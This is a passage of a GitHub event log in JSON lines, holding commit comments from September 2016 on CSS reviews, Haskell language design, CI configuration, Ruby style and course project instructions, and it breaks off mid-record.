{"id":"4578656695","type":"CommitCommentEvent","actor":{"login":"plumpudding"},"repo":{"name":"eulenfunk/fastd-peers"},"payload":{"comment":{"id":19067113,"position":4,"line":2,"path":"nefmet/met0","commit_id":"b7378a0d9f5d3eef79e62deaa58991c217bb4975","created_at":"2016-09-17T21:01:52Z","updated_at":"2016-09-17T21:01:52Z","body":"sicher dass auch \"remotes\" funktioniert?"}},"created_at":"2016-09-17T21:01:52Z"}
{"id":"4578657020","type":"CommitCommentEvent","actor":{"login":"Demonid"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19067115,"position":null,"line":null,"path":null,"commit_id":"b5035582b656df780e8ebeeb3647288bf1be8256","created_at":"2016-09-17T21:02:05Z","updated_at":"2016-09-17T21:02:05Z","body":"@ariel- Got this on my World SQL, maybe some of this could be added if they are not yet.\r\n\r\nhttps://gist.github.com/Demonid/e2c92b2dca0649dcdfe2a75cfc26eda0"}},"created_at":"2016-09-17T21:02:05Z"}
{"id":"4578657469","type":"CommitCommentEvent","actor":{"login":"sippolaj"},"repo":{"name":"sippolaj/hello_world"},"payload":{"comment":{"id":19067120,"position":null,"line":null,"path":null,"commit_id":"ad3acd5841e2d74cd6dc0aebf1bdb5d580ef1482","created_at":"2016-09-17T21:02:21Z","updated_at":"2016-09-17T21:02:21Z","body":"kokeillaan miten toimii"}},"created_at":"2016-09-17T21:02:21Z"}
{"id":"4578659104","type":"CommitCommentEvent","actor":{"login":"tjhorner"},"repo":{"name":"fdcabb611f5e10605d933575bcac24c9/Jeonhwa"},"payload":{"comment":{"id":19067123,"position":null,"line":null,"path":null,"commit_id":"cd3f098c5b73fbe0f3cd1ffbad2493f8d4deec67","created_at":"2016-09-17T21:02:48Z","updated_at":"2016-09-17T21:02:48Z","body":"do not use command line"}},"created_at":"2016-09-17T21:02:48Z"}
{"id":"4578659356","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19067125,"position":null,"line":null,"path":null,"commit_id":"724fa370aa47dc2eb65ec4285561bd2a3f9224e5","created_at":"2016-09-17T21:02:58Z","updated_at":"2016-09-17T21:02:58Z","body":"This was causing BE pet values to become negative, switching over to my personal workspace for future commits so I don't keep reverting here"}},"created_at":"2016-09-17T21:02:58Z"}
{"id":"4578659516","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19067127,"position":51,"line":51,"path":"00-HTML-CSS-basics/css/2.5/styles/styles_layout.css","commit_id":"aa0f83ea3fa43d15154b2bfa888fabaacfb68bf9","created_at":"2016-09-17T21:03:05Z","updated_at":"2016-09-17T21:03:05Z","body":"* ??"}},"created_at":"2016-09-17T21:03:05Z"}
{"id":"4578659588","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067128,"position":73,"line":248,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T21:03:07Z","updated_at":"2016-09-17T21:03:07Z","body":"Would this imply a typeclass constraint? Like, `use` \"has type\" `Handle a => a -> (a -> b) -> b`?"}},"created_at":"2016-09-17T21:03:07Z"}
{"id":"4578659964","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067129,"position":47,"line":111,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T21:03:22Z","updated_at":"2016-09-17T21:03:22Z","body":"So it's a monad?"}},"created_at":"2016-09-17T21:03:22Z"}
{"id":"4578662301","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19067138,"position":55,"line":55,"path":"00-HTML-CSS-basics/css/2.5/styles/styles_layout.css","commit_id":"aa0f83ea3fa43d15154b2bfa888fabaacfb68bf9","created_at":"2016-09-17T21:05:04Z","updated_at":"2016-09-17T21:05:04Z","body":"Please review and fix indentation and alphaorder in all your css files."}},"created_at":"2016-09-17T21:05:04Z"}
{"id":"4578662931","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19067143,"position":55,"line":55,"path":"00-HTML-CSS-basics/css/2.5/styles/styles_layout.css","commit_id":"aa0f83ea3fa43d15154b2bfa888fabaacfb68bf9","created_at":"2016-09-17T21:05:29Z","updated_at":"2016-09-17T21:05:29Z","body":"try `opacity: 0.75;`"}},"created_at":"2016-09-17T21:05:29Z"}
{"id":"4578665252","type":"CommitCommentEvent","actor":{"login":"Enschrogelio"},"repo":{"name":"Enschrogelio/SubMenus"},"payload":{"comment":{"id":19067151,"position":null,"line":null,"path":null,"commit_id":"cbae011b0da624ecec7747337814582f26de14e7","created_at":"2016-09-17T21:07:03Z","updated_at":"2016-09-17T21:07:03Z","body":"<p align=\"center\">SubMenus</p>\r\n \r\n <p align=\"center\">\r\n  <img src=\"https://github.com/Enschrogelio/Spinner/blob/master/example%20view%201.png?raw=true\" width=\"350\"/>\r\n <img src=\"https://github.com/Enschrogelio/Spinner/blob/master/example%20view%202.png?raw=true\" width=\"350\"/>\r\n </p>"}},"created_at":"2016-09-17T21:07:03Z"}
{"id":"4578665582","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19067154,"position":6,"line":6,"path":"00-HTML-CSS-basics/css/2.5/layout.html","commit_id":"aa0f83ea3fa43d15154b2bfa888fabaacfb68bf9","created_at":"2016-09-17T21:07:17Z","updated_at":"2016-09-17T21:07:17Z","body":"missing title"}},"created_at":"2016-09-17T21:07:17Z"}
{"id":"4578667240","type":"CommitCommentEvent","actor":{"login":"qmac"},"repo":{"name":"tyarkoni/featureX"},"payload":{"comment":{"id":19067161,"position":null,"line":null,"path":null,"commit_id":"09169bb6f214fc8362b2c47cb88f9cf89cc4b348","created_at":"2016-09-17T21:08:27Z","updated_at":"2016-09-17T21:08:27Z","body":"According to the build log, `apt-get` needs sudo privilege, can I get rid of `sudo:false`?"}},"created_at":"2016-09-17T21:08:27Z"}
{"id":"4578667571","type":"CommitCommentEvent","actor":{"login":"Massodo"},"repo":{"name":"feltiko/OmSUProg"},"payload":{"comment":{"id":19067164,"position":25,"line":25,"path":"src/Vector3DProcessor.java","commit_id":"8ee5bb3f7d34782c5e5bc3746fbecd78dfe953f7","created_at":"2016-09-17T21:08:40Z","updated_at":"2016-09-17T21:08:40Z","body":"Минус потерял. :+1: "}},"created_at":"2016-09-17T21:08:40Z"}
{"id":"4578668413","type":"CommitCommentEvent","actor":{"login":"fabricioct"},"repo":{"name":"fabricioct/fabricioct.github.io"},"payload":{"comment":{"id":19067168,"position":null,"line":null,"path":null,"commit_id":"646c54540b91cdc36d99b5c4b4b540941971fb02","created_at":"2016-09-17T21:09:15Z","updated_at":"2016-09-17T21:09:15Z","body":"ffff"}},"created_at":"2016-09-17T21:09:15Z"}
{"id":"4578668462","type":"CommitCommentEvent","actor":{"login":"HeitorIshihara"},"repo":{"name":"HeitorIshihara/Source-Code-Inspection"},"payload":{"comment":{"id":19067169,"position":null,"line":null,"path":null,"commit_id":"17ddd151abeb80790494bc3df92b76518d8fd1b4","created_at":"2016-09-17T21:09:18Z","updated_at":"2016-09-17T21:09:18Z","body":"Esse commit corrigi também a issue #3 "}},"created_at":"2016-09-17T21:09:18Z"}
{"id":"4578668674","type":"CommitCommentEvent","actor":{"login":"tyarkoni"},"repo":{"name":"tyarkoni/featureX"},"payload":{"comment":{"id":19067170,"position":null,"line":null,"path":null,"commit_id":"09169bb6f214fc8362b2c47cb88f9cf89cc4b348","created_at":"2016-09-17T21:09:26Z","updated_at":"2016-09-17T21:09:26Z","body":"Yep, that should be fine."}},"created_at":"2016-09-17T21:09:26Z"}
{"id":"4578668803","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"andres-p28/startup"},"payload":{"comment":{"id":19067171,"position":58,"line":58,"path":"00-HTML-CSS-basics/css/2.5/styles/styles_layout.css","commit_id":"aa0f83ea3fa43d15154b2bfa888fabaacfb68bf9","created_at":"2016-09-17T21:09:31Z","updated_at":"2016-09-17T21:09:31Z","body":"There are a few properties in this rule that are not necessary and others that are overwriting each other. Please review this rule and do some clean up."}},"created_at":"2016-09-17T21:09:31Z"}
{"id":"4578670781","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067183,"position":9,"line":15,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T21:10:52Z","updated_at":"2016-09-17T21:10:52Z","body":"Uhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh."}},"created_at":"2016-09-17T21:10:52Z"}
{"id":"4578670784","type":"CommitCommentEvent","actor":{"login":"primle"},"repo":{"name":"disperate/moveDev.ui"},"payload":{"comment":{"id":19067184,"position":null,"line":null,"path":null,"commit_id":"18a1a3d5763343a7a3d356c5d88417d5aaf0edb1","created_at":"2016-09-17T21:10:52Z","updated_at":"2016-09-17T21:10:52Z","body":"phonenumber can be changed to an employee"}},"created_at":"2016-09-17T21:10:52Z"}
{"id":"4578670953","type":"CommitCommentEvent","actor":{"login":"diegorodriguesvieira"},"repo":{"name":"TwistedScorpio/OTHire"},"payload":{"comment":{"id":19067187,"position":null,"line":null,"path":null,"commit_id":"ea43dec790f4b268b18356cf0ad187ca694d04b4","created_at":"2016-09-17T21:11:01Z","updated_at":"2016-09-17T21:11:01Z","body":"Thanks dude! =)"}},"created_at":"2016-09-17T21:11:01Z"}
{"id":"4578672201","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067194,"position":9,"line":9,"path":"experiments/amulet/design/ReadMe.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T21:11:52Z","updated_at":"2016-09-17T21:11:52Z","body":"I think I can handle this bit."}},"created_at":"2016-09-17T21:11:52Z"}
{"id":"4578672604","type":"CommitCommentEvent","actor":{"login":"tyarkoni"},"repo":{"name":"tyarkoni/featureX"},"payload":{"comment":{"id":19067198,"position":null,"line":null,"path":null,"commit_id":"09169bb6f214fc8362b2c47cb88f9cf89cc4b348","created_at":"2016-09-17T21:12:07Z","updated_at":"2016-09-17T21:12:07Z","body":"You may need to  specify `sudo: required`, actually. See [this](https://docs.travis-ci.com/user/ci-environment/)--I think travis might be running our builds on container infrastructure."}},"created_at":"2016-09-17T21:12:07Z"}
{"id":"4578673430","type":"CommitCommentEvent","actor":{"login":"bigretromike"},"repo":{"name":"japanesemediamanager/jmmserver"},"payload":{"comment":{"id":19067205,"position":null,"line":null,"path":null,"commit_id":"f4a8bd03404e1ab43458241d7292b4dfed1408a7","created_at":"2016-09-17T21:12:41Z","updated_at":"2016-09-17T21:12:41Z","body":"For diagnostic dashboard: https://github.com/NancyFx/Nancy/wiki/Diagnostics"}},"created_at":"2016-09-17T21:12:41Z"}
{"id":"4578674790","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067211,"position":2,"line":10,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T21:13:37Z","updated_at":"2016-09-17T21:13:37Z","body":"Are we sure on these? I feel like the compiler would only provide the 'magic' bits, like `Int#`. Then the standard library would have a `newtype Int = MkInt# Int#` with checked addition, etc."}},"created_at":"2016-09-17T21:13:37Z"}
{"id":"4578675307","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067214,"position":2,"line":10,"path":"experiments/amulet/design/design-old.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T21:14:00Z","updated_at":"2016-09-17T21:14:00Z","body":"Also; Is `Integer` a BigInt? If so, is it backed by GMP or a custom implementation?"}},"created_at":"2016-09-17T21:14:00Z"}
{"id":"4578678167","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067225,"position":12,"line":12,"path":"00-HTML-CSS-basics/Ejercicio 2.1/index.html","commit_id":"897b192e43b0ecf41edc9ef67bdd4ebfdffc364c","created_at":"2016-09-17T21:15:56Z","updated_at":"2016-09-17T21:15:56Z","body":"Nice layout! "}},"created_at":"2016-09-17T21:15:56Z"}
{"id":"4578678511","type":"CommitCommentEvent","actor":{"login":"Kryptonit3"},"repo":{"name":"dansup/laravel-edmunds"},"payload":{"comment":{"id":19067226,"position":null,"line":null,"path":null,"commit_id":"7c75f8a201d44b0f30189442d79c085fcab50c8a","created_at":"2016-09-17T21:16:10Z","updated_at":"2016-09-17T21:16:10Z","body":"you should revert this change to prevent conflicts if edmunds ever releases a package. It is normal for a developer to have their name at the beginning of a namespace.\r\n"}},"created_at":"2016-09-17T21:16:10Z"}
{"id":"4578679624","type":"CommitCommentEvent","actor":{"login":"Lukas1990"},"repo":{"name":"ccrisan/motioneyeos"},"payload":{"comment":{"id":19067230,"position":null,"line":null,"path":null,"commit_id":"7fe6ed1eb6ef2291b830c3711857595770f01f9d","created_at":"2016-09-17T21:16:59Z","updated_at":"2016-09-17T21:16:59Z","body":"thank you. And ssh and sftp dont work, i had to use previous release."}},"created_at":"2016-09-17T21:16:59Z"}
{"id":"4578680892","type":"CommitCommentEvent","actor":{"login":"sant0ro"},"repo":{"name":"sant0ro/Yupi"},"payload":{"comment":{"id":19067234,"position":8,"line":84,"path":"Yupi.Controller/AchievementManager.cs","commit_id":"19529adec8b968e70ae310b66f78da81e1bbf997","created_at":"2016-09-17T21:17:53Z","updated_at":"2016-09-17T21:17:53Z","body":"Subscriptions aren't coded yet yeah?"}},"created_at":"2016-09-17T21:17:53Z"}
{"id":"4578681938","type":"CommitCommentEvent","actor":{"login":"changqiongli"},"repo":{"name":"changqiongli/Math"},"payload":{"comment":{"id":19067242,"position":null,"line":null,"path":null,"commit_id":"fa438f665bbbb06b512d8a5f1bb360974df7a52d","created_at":"2016-09-17T21:18:38Z","updated_at":"2016-09-17T21:18:38Z","body":"This semester my daughter got a \"C\" for Math. I found her calculation is so bad.  I code the Math  and want to change this situation. This is calculation within 100. \r\n  "}},"created_at":"2016-09-17T21:18:38Z"}
{"id":"4578682003","type":"CommitCommentEvent","actor":{"login":"fercho8787"},"repo":{"name":"Emmanuel-Benvenutto/startup"},"payload":{"comment":{"id":19067243,"position":17,"line":17,"path":"00-HTML-CSS-basics/Ejercicio 2.1/index.html","commit_id":"897b192e43b0ecf41edc9ef67bdd4ebfdffc364c","created_at":"2016-09-17T21:18:40Z","updated_at":"2016-09-17T21:18:40Z","body":"Remember that according to our standard, BEM should be written like: \r\n**Block--Element_Modifier**\r\n\r\nI like to see that you implemented BEM.\r\n"}},"created_at":"2016-09-17T21:18:40Z"}
{"id":"4578683070","type":"CommitCommentEvent","actor":{"login":"tonyxiao"},"repo":{"name":"wincent/command-t"},"payload":{"comment":{"id":19067248,"position":null,"line":null,"path":null,"commit_id":"778e8eacf54906de639e3e1db562ee207927f1b9","created_at":"2016-09-17T21:19:23Z","updated_at":"2016-09-17T21:19:23Z","body":"What a commit message!"}},"created_at":"2016-09-17T21:19:23Z"}
{"id":"4578683243","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"postgred/myrubycource"},"payload":{"comment":{"id":19067249,"position":8,"line":22,"path":"movies.rb","commit_id":"5fd2d351023641e7377be357d37a1f217f52a4b0","created_at":"2016-09-17T21:19:31Z","updated_at":"2016-09-17T21:19:31Z","body":"Ага, но руби, как ни странно, поймёт и так: `do |films, (key, value)`. Остальное станет читабельнее."}},"created_at":"2016-09-17T21:19:31Z"}
{"id":"4578683255","type":"CommitCommentEvent","actor":{"login":"tonyxiao"},"repo":{"name":"wincent/command-t"},"payload":{"comment":{"id":19067250,"position":null,"line":null,"path":null,"commit_id":"778e8eacf54906de639e3e1db562ee207927f1b9","created_at":"2016-09-17T21:19:32Z","updated_at":"2016-09-17T21:19:32Z","body":"HTTP Referrer: https://wincent.com/blog/demons"}},"created_at":"2016-09-17T21:19:32Z"}
{"id":"4578683466","type":"CommitCommentEvent","actor":{"login":"tyarkoni"},"repo":{"name":"tyarkoni/featureX"},"payload":{"comment":{"id":19067251,"position":null,"line":null,"path":null,"commit_id":"09169bb6f214fc8362b2c47cb88f9cf89cc4b348","created_at":"2016-09-17T21:19:41Z","updated_at":"2016-09-17T21:19:41Z","body":"Just took a look at the last failure on the Python 3 job. It's caused by a failure to specify the correct (versioned) miniconda installers. I already fixed this on the `core-overhaul` branch, so you can copy the relevant miniconda URLs from [here](https://github.com/tyarkoni/featureX/blob/core-overhaul/.travis.yml). (Don't worry about integrating all the other changes; I'll fix the merge conflicts after I merge `core-overhaul` into master, probably next week.)"}},"created_at":"2016-09-17T21:19:41Z"}
{"id":"4578683668","type":"CommitCommentEvent","actor":{"login":"cejaramillof"},"repo":{"name":"cejaramillof/AngularJS1"},"payload":{"comment":{"id":19067253,"position":null,"line":null,"path":null,"commit_id":"badd96257f4e942cf6d6521bce80eaf29ec39685","created_at":"2016-09-17T21:19:51Z","updated_at":"2016-09-17T21:19:51Z","body":"3.0 = ui-mask : Mascaras para tus campos de texto"}},"created_at":"2016-09-17T21:19:51Z"}
{"id":"4578684227","type":"CommitCommentEvent","actor":{"login":"Azakur4"},"repo":{"name":"adobe/brackets"},"payload":{"comment":{"id":19067257,"position":5,"line":105,"path":"src/extensions/default/HTMLCodeHints/HtmlAttributes.json","commit_id":"2286cd1db260fcfb130435161416a55b007472a9","created_at":"2016-09-17T21:20:15Z","updated_at":"2016-09-17T21:20:15Z","body":"the comma was forget here? betwwen \"on\" and \"organization\""}},"created_at":"2016-09-17T21:20:15Z"}
{"id":"4578685188","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"postgred/myrubycource"},"payload":{"comment":{"id":19067262,"position":37,"line":38,"path":"movies.rb","commit_id":"37524d8e1eb175602512699918382860202cac8a","created_at":"2016-09-17T21:20:58Z","updated_at":"2016-09-17T21:20:58Z","body":"Не будет работать ;) потому што `map(&field)` (двоеточие лишнее)"}},"created_at":"2016-09-17T21:20:58Z"}
{"id":"4578685705","type":"CommitCommentEvent","actor":{"login":"zverok"},"repo":{"name":"postgred/myrubycource"},"payload":{"comment":{"id":19067264,"position":39,"line":40,"path":"movies.rb","commit_id":"37524d8e1eb175602512699918382860202cac8a","created_at":"2016-09-17T21:21:22Z","updated_at":"2016-09-17T21:21:22Z","body":"А вместо этого each лучше map + to_h"}},"created_at":"2016-09-17T21:21:22Z"}
{"id":"4578689931","type":"CommitCommentEvent","actor":{"login":"jezdez"},"repo":{"name":"jazzband/django-constance"},"payload":{"comment":{"id":19067281,"position":null,"line":null,"path":null,"commit_id":"56fb550044f004805429f0e70bd3e92ce55845af","created_at":"2016-09-17T21:24:36Z","updated_at":"2016-09-17T21:24:36Z","body":"Hey @camilonova, the tests [failed for this commit](https://travis-ci.org/jazzband/django-constance/builds/160720592) and you still released it to PyPI. Neither issue nor PR were opened to track this issue. This is not good. Please refrain from doing such commit and forget releases."}},"created_at":"2016-09-17T21:24:36Z"}
{"id":"4578691060","type":"CommitCommentEvent","actor":{"login":"Moorviper"},"repo":{"name":"eulenfunk/fastd-peers"},"payload":{"comment":{"id":19067289,"position":4,"line":2,"path":"nefmet/met0","commit_id":"b7378a0d9f5d3eef79e62deaa58991c217bb4975","created_at":"2016-09-17T21:25:23Z","updated_at":"2016-09-17T21:25:23Z","body":"remotes sollte gehen bei fastd, verwenden wir in Fulda auch für jeweils 2 tunnel pro gate:\r\n\r\nBsp:\r\n            remotes = {\r\n              '\"gw01.fulda.freifunk.net\" port 10000',\r\n              '\"gw01.fulda.freifunk.net\" port 20000',\r\n            },"}},"created_at":"2016-09-17T21:25:23Z"}
{"id":"4578692581","type":"CommitCommentEvent","actor":{"login":"dansup"},"repo":{"name":"dansup/laravel-edmunds"},"payload":{"comment":{"id":19067295,"position":null,"line":null,"path":null,"commit_id":"7c75f8a201d44b0f30189442d79c085fcab50c8a","created_at":"2016-09-17T21:26:28Z","updated_at":"2016-09-17T21:26:28Z","body":"@Kryptonit3 You are correct, I will re-add the namespace. Sorry about that!"}},"created_at":"2016-09-17T21:26:28Z"}
{"id":"4578693556","type":"CommitCommentEvent","actor":{"login":"zstadler"},"repo":{"name":"IsraelHikingMap/Site"},"payload":{"comment":{"id":19067303,"position":3,"line":3,"path":"IsrealHiking.Web/controllers/CoordinatesMarkerPopup.html","commit_id":"6dff78f0600d24fae3ad1a6cae636efafd68ae16","created_at":"2016-09-17T21:27:11Z","updated_at":"2016-09-17T21:27:11Z","body":"The request was for 6 fractional digits (right of the decimal period) for Latitude and 7 fractional digits for the Longitude:\r\n\r\n```{{resources.latitudeAbbreviation}} {{latLng.lat | number:6 }}°, {{resources.longitudeAbbreviation}} {{latLng.lng | number:7}}°<br />```"}},"created_at":"2016-09-17T21:27:11Z"}
{"id":"4578693871","type":"CommitCommentEvent","actor":{"login":"lordloki"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19067305,"position":10,"line":402,"path":"source/gameengine/Ketsji/KX_KetsjiEngine.cpp","commit_id":"b2c97492ef5b9d0978f8983ab31bd6f6626fe6ba","created_at":"2016-09-17T21:27:25Z","updated_at":"2016-09-17T21:27:25Z","body":"style: space between if and (DEV_"}},"created_at":"2016-09-17T21:27:25Z"}
{"id":"4578694149","type":"CommitCommentEvent","actor":{"login":"pilamb"},"repo":{"name":"Semillas/semillas_backend"},"payload":{"comment":{"id":19067307,"position":null,"line":null,"path":null,"commit_id":"5745ef579edfecd02686c6155ba10ba7c578a654","created_at":"2016-09-17T21:27:37Z","updated_at":"2016-09-17T21:27:37Z","body":"Hey!\r\nThat's pretty cool. Didn't know those tags, old school manners xD. Will take a look and consider to follow the advice. Thanks!"}},"created_at":"2016-09-17T21:27:37Z"}
{"id":"4578694270","type":"CommitCommentEvent","actor":{"login":"lordloki"},"repo":{"name":"UPBGE/blender"},"payload":{"comment":{"id":19067308,"position":null,"line":null,"path":null,"commit_id":"b2c97492ef5b9d0978f8983ab31bd6f6626fe6ba","created_at":"2016-09-17T21:27:44Z","updated_at":"2016-09-17T21:27:44Z","body":"It seems me ok."}},"created_at":"2016-09-17T21:27:44Z"}
{"id":"4578694607","type":"CommitCommentEvent","actor":{"login":"chriskuehl"},"repo":{"name":"asottile/rubyvenv"},"payload":{"comment":{"id":19067310,"position":4,"line":4,"path":"setup.py","commit_id":"fc136905f4e4bb499dcc577487593a4a761053a5","created_at":"2016-09-17T21:27:59Z","updated_at":"2016-09-17T21:27:59Z","body":"i don't think this sounds sufficiently similar to \"rvm\" or \"rbenv\" when spoken out loud\r\n\r\ni suggest naming it something like \"rvenv\" or \"rbm\" to keep with the long-standing tradition of trying to make it as difficult as possible to tell which somebody is talking about"}},"created_at":"2016-09-17T21:27:59Z"}
{"id":"4578695616","type":"CommitCommentEvent","actor":{"login":"demhydraz"},"repo":{"name":"SquidDev/LuaCompilerProject"},"payload":{"comment":{"id":19067321,"position":8,"line":8,"path":"experiments/amulet/design/00-overview.md","commit_id":"28cb1b4d1d2ef2ae435e96d5a6ca8de7edf7b79b","created_at":"2016-09-17T21:28:44Z","updated_at":"2016-09-17T21:28:44Z","body":"A magic function\r\n```haskell\r\nmutate :: a -> (a -> b) -> b\r\n```\r\nwould be our best bet for this.\r\nTogether with something like `seq`, we could have a function like\r\n```\r\nincBy :: Add a => a -> a -> ()\r\nincBy toAdd value = value `mutate` (+ toAdd) `seq` ()\r\n```\r\n\r\nIdeally this would overwrite the value in-place, so this is *very* magic, and *definitely* not for the faint of heart.\r\n\r\nA better idea for user-side mutation would be a monad like `ST`, where you can get references to values that can be read/written.\r\n\r\n```haskell\r\nsumST :: Num a => [a] -> a\r\nsumST xs = runST $ do\r\n    n <- newSTRef 0\r\n    forM_ xs $ \\x -> do\r\n        modifySTRef n (+x)\r\n    readSTRef n\r\nfibST :: Integer -> Integer\r\nfibST n = \r\n    if n < 2\r\n    then n\r\n    else runST $ do\r\n        x <- newSTRef 0\r\n        y <- newSTRef 1\r\n        fibST' n x y\r\n \r\n    where fibST' 0 x _ = readSTRef x\r\n          fibST' n x y = do\r\n              x' <- readSTRef x\r\n              y' <- readSTRef y\r\n              writeSTRef x y'\r\n              writeSTRef y $! x'+y'\r\n              fibST' (n-1) x y\r\n```\r\n\r\nIdeally, unlike the Haskell, there'd be a typeclass `Monad m => MonadRW m` with an associated type family `Ref (MonadRW m) a`, for a reference of type `a`. Then, references in I/O, ST, and, say, STM would have a consistent interface."}},"created_at":"2016-09-17T21:28:44Z"}
{"id":"4578696366","type":"CommitCommentEvent","actor":{"login":"ariel-"},"repo":{"name":"TrinityCore/TrinityCore"},"payload":{"comment":{"id":19067328,"position":null,"line":null,"path":null,"commit_id":"b5035582b656df780e8ebeeb3647288bf1be8256","created_at":"2016-09-17T21:29:19Z","updated_at":"2016-09-17T21:29:19Z","body":"Only 14795 Venomhide Poison and 30567 Torment of the Worgen aren't in TDB.\r\n\r\n@joschiwald: Not quite. see Earth Shield heal (spellId: 379) it has SPELL_DAMAGE_CLASS_NONE; but it must scale"}},"created_at":"2016-09-17T21:29:19Z"}
{"id":"4578696485","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"official-stockfish/Stockfish"},"payload":{"comment":{"id":19067329,"position":111,"line":479,"path":"src/evaluate.cpp","commit_id":"01f2466f6eba4d4b28f0cd6ac7c2fd38d95b9401","created_at":"2016-09-17T21:29:25Z","updated_at":"2016-09-17T21:29:25Z","body":"@mcostalba I understand. It also seems to be a slight regression with pgo-builds."}},"created_at":"2016-09-17T21:29:25Z"}
{"id":"4578697632","type":"CommitCommentEvent","actor":{"login":"lau"},"repo":{"name":"elixir-lang/elixir"},"payload":{"comment":{"id":19067334,"position":218,"line":758,"path":"lib/elixir/lib/calendar.ex","commit_id":"e50735ff2a7c16cc7705d8fa59af906e986c19f7","created_at":"2016-09-17T21:30:15Z","updated_at":"2016-09-17T21:30:15Z","body":"I think I might have come to the same conclusion as you with having diff functions instead of specific to_gregorian functions. For instance to get gregorian seconds for a NaiveDateTime just use a diff function and pass `~N[0000-01-01 00:00:00]`. 👍  I think that is a good idea. So to_gregorian_seconds is not strictly necessary. In the docs of a diff function there could be an example with the gregorian epoch. It might make sense to have \"fast track\" function definitions for diff matching on the gregorian epoch."}},"created_at":"2016-09-17T21:30:15Z"}
{"id":"4578697899","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":19067336,"position":null,"line":null,"path":null,"commit_id":"01b4ada1482f7e02266be75178b9da65df498267","created_at":"2016-09-17T21:30:27Z","updated_at":"2016-09-17T21:30:27Z","body":"Also see [Issue 277: Cut-over to CRYPTOPP_ASSERT due to CVE-2016-7420](http://github.com/weidai11/cryptopp/issues/277)."}},"created_at":"2016-09-17T21:30:27Z"}
{"id":"4578698113","type":"CommitCommentEvent","actor":{"login":"mezz"},"repo":{"name":"ForestryMC/ForestryMC"},"payload":{"comment":{"id":19067338,"position":6,"line":117,"path":"src/main/java/forestry/factory/tiles/TileCentrifuge.java","commit_id":"253e9f18edc3c09854fc98c348ac6855aba9f7d8","created_at":"2016-09-17T21:30:36Z","updated_at":"2016-09-17T21:30:36Z","body":"Please remove this comment because it is not true any more"}},"created_at":"2016-09-17T21:30:36Z"}
{"id":"4578700310","type":"CommitCommentEvent","actor":{"login":"mezz"},"repo":{"name":"ForestryMC/ForestryMC"},"payload":{"comment":{"id":19067351,"position":null,"line":null,"path":null,"commit_id":"80de4d6490e0a971fa27ae2704becd78f04ed48d","created_at":"2016-09-17T21:32:01Z","updated_at":"2016-09-17T21:32:01Z","body":":+1: "}},"created_at":"2016-09-17T21:32:01Z"}
{"id":"4578700744","type":"CommitCommentEvent","actor":{"login":"andrewgaul"},"repo":{"name":"jclouds/jclouds"},"payload":{"comment":{"id":19067352,"position":null,"line":null,"path":null,"commit_id":"76995a363d1cabaee26066b52a476ae28c4fd638","created_at":"2016-09-17T21:32:18Z","updated_at":"2016-09-17T21:32:18Z","body":"@nacx Thanks for the pointer; addressed by 080bcce224e8752840b332debd1a3be7a4ae8c5f."}},"created_at":"2016-09-17T21:32:18Z"}
{"id":"4578703918","type":"CommitCommentEvent","actor":{"login":"JeffBship"},"repo":{"name":"JeffBship/CS530-team-projects-Harhay-Blankenship-Somma"},"payload":{"comment":{"id":19067361,"position":null,"line":null,"path":null,"commit_id":"1f898c1cc9eccd4751ef2086bc2c41505982f04e","created_at":"2016-09-17T21:34:16Z","updated_at":"2016-09-17T21:34:16Z","body":"Hi,\r\nThe person serving as your team’s main contact must have already received the project description for your team. Here are the next steps:\r\n1.\tEach team needs to create a shared github repository for their project. \r\n2.\tThe repository name should begin with CS530-16. \r\n3.\tAdd my account (kurkovsky) as a member (not owner!) of your repository.\r\n4.\tCreate a new directory (Documents) inside your repository.\r\n5.\tPlace all deliverables into the Documents directory. Be sure to have no other documents in it.\r\n6.\tThe file names for all your deliverables must be self-explanatory.\r\n7.\tFeel free to send me emails with questions, but all deliverables must be submitted via github.\r\n\r\nSK\r\n\r\nSubmit an informal 